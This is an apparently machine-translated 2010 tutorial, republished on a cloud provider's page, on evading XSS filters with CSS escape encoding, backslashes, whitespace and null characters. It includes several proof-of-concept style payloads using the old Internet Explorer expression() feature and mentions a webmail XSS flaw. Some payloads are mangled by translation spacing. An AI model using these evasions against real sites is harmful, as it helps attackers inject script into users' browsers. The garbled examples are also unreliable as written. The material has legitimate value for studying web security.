XSS vulnerability mining-Three Tips for CSS encoding and backslash

Source: Internet
Author: User

Encoding and backslash are also basic methods to be mastered in XSS vulnerability mining. Here we provide three techniques for XSS vulnerability mining that use CSS encoding and backslash.

Author & Translator: www.pulog.org
2010/07/17

Tip 1: change the number of 0 encoded values (\ 0X-> \ 00000X ).
Example: <p style = "xss: \ 65 xpression (alert (/wpulog/)">
<P style = "xss: \ 065 xpression (alert (/wpulog/)">
<P style = "xss: \ 0065 xpression (alert (/wpulog/)">
The results are the same.

Tip 2: Change the case sensitivity of the encoded characters (\ 0A-> \ 0a ).
Example: <p style = "xss: expression (alert (/wpulog/) \ x0d">
<P style = "xss: expression (alert (/wpulog/) \ x0D">
The results are the same.

Tip 3: Add a blank character (IE supports \ x20, \ x09; FF and Opera Support \ x0A, \ x0D) behind the encoded characters ).
For example, in IE, <p sytle = "xss: \ 65 xpression (alert (/wpulog/)"> can also run, with spaces between \ 65 and x.

In addition, adding a backslash before a letter in CSS will be ignored. For example, \ x is equivalent to x, and \ n is not equal to n. You can also add a backslash before the line break (\ x0A, \ X0D) in Firefox, for example, <div style = "xx:
\
Gg ">
In IE, the CSS attribute value can be inserted with an empty character (\ 0). For example, the Netease mailbox Webmail XSS Vulnerability
<P style = "xss: ex & #00; pression (alert (/wpulog/)">.
Different browsers may support different encoding methods. For example, Firefox does not support encoding of parentheses. IE supports parentheses, for example, <p style = "xss: expression \ 28alert \ 28/wpulog/\ 29 \ 29"> which can be normally executed in IE.
These techniques can be used in combination with other encoding methods, and may receive unexpected results in XSS vulnerability mining.


[+] Reference:
~~~~~~~~~
Http://heideri.ch/jso/#61

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.